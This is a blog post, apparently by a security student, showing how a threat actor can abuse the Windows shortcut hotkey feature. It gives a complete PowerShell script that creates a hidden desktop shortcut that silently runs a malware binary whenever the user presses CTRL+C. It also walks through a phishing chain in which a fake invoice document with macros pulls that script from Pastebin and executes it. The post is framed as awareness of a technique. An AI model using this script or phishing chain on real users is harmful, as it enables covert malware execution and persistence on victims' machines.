Utilizing Windows LNK Features for Phishing With Macro Malware

Crafting a Windows LNK with hotkey features => execute system command. Then, create a Microsoft office macro enabled document to utilize the malicious LNK to create a phishing environment.

Today we will be trying on an interesting Windows LNK features which most of us might not be aware of “The Shortcut Key Feature”.

So what does this shortcut key feature does?

We take this Visual Studio Code shortcut as an example. Let’s say, we want to execute the Visual Studio Code without double-clicking on the shortcut, instead we want to execute it by just type on the hotkey “Ctrl+Alt+1”. So we set it into something like this.

Everytime we type the hotkey on any of the window screen, it will trigger this Visual Studio shortcut’s target to execute the Code.exe to open the Visual Studio Code.

How Can Threat Actor Abuse The Windows LNK Hotkey Feature?

If you notice that, when you want to type in the “Shortcut Key” like Alt+1, it will auto append the control key into it (Ctrl+Alt+1).

If a threat actor want to craft a malware which everytimes the target type in the hotkey “CTRL + C” which is the copy hotkey by default. The threat actor can just use the CLI Powershell to execute the commands to create the LNK file.

Powershell Command Creating Malicious Shortcut File:

#Get the user home directory location & location to place the shortcut file
$malLoc = $home + “\Desktop\mal.lnk”

#Create WScript.Shell object
$WshShell = New-Object -comObject WScript.Shell

#LNK file location creation
$Shortcut = $WshShell.CreateShortcut($malLoc)

#Executing cmd.exe
$Shortcut.TargetPath = ‘C:\Windows\System32\cmd.exe’

#Malicious Command to be executed
$Shortcut.Arguments = ‘/c malware.exe’

#Hotkey to trigger the LNK file
$Shortcut.hotkey = ‘CTRL+C’

#Run the LNK file in minimize window
$Shortcut.WindowStyle = 7

#Save the LNK file
$Shortcut.Save()

#Hiding the malicious LNK file
attrib +h $malLoc

So with the following commands, the threat actor can create the LNK file with the hotkey of “CTRL+C”. Everytimes the target wants to copy something using the hotkey of “CTRL+C”, it will trigger the LNK file to execute the malware.exe binary.

How Can Threat Actor Distribute These To Their Target?

In order to place the the “malicious LNK file creation” Powershell commands in the target machine, they can distribute it using one of the famous phishing technique which will be macro enabled office document.

So let’s walkthrough how can we create the phishing environment.

First the threat actor can host the Powershell command in places like Pastebin.

Then, the threat actor will craft the macro enabled office document. To persuade the target, the threat actor will create a fake invoices document to persuade the target to click on “enable macro content” button.

In the fake invoice document, there will be a macro script which will be downloading the Powershell command to create the malicious LNK file & execute with Powershell.

Now when the threat actor will sent the fake invoice document by spreading it to all their target’s email inbox. After the target downloaded the fake invoice document, if they clicked on the “Enable Content” button, the malicious Powershell command will be executed.

Here let’s take a look how would it looks like after the target execute the fake invoice document until typing the “CTRL+C” hotkey to trigger the malicious LNK file.

Conclude

So that’s how I can imagine a threat actor crafting the phishing environment by abusing the LNK file hotkey feature, as we know that threat actors they’re quite smart, we might not aware of their new techniques that they made everytimes.

The codes for the LNK file creation & Office document macro script I’ve uploaded to my GitHub repo. You can check it out in the link below.

Explanation video:

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Bryan Leong (NobodyAtall)

Bryan Leong (NobodyAtall)

A Bachelor of Computer Science student that’s passion in CyberSec & Pentesting.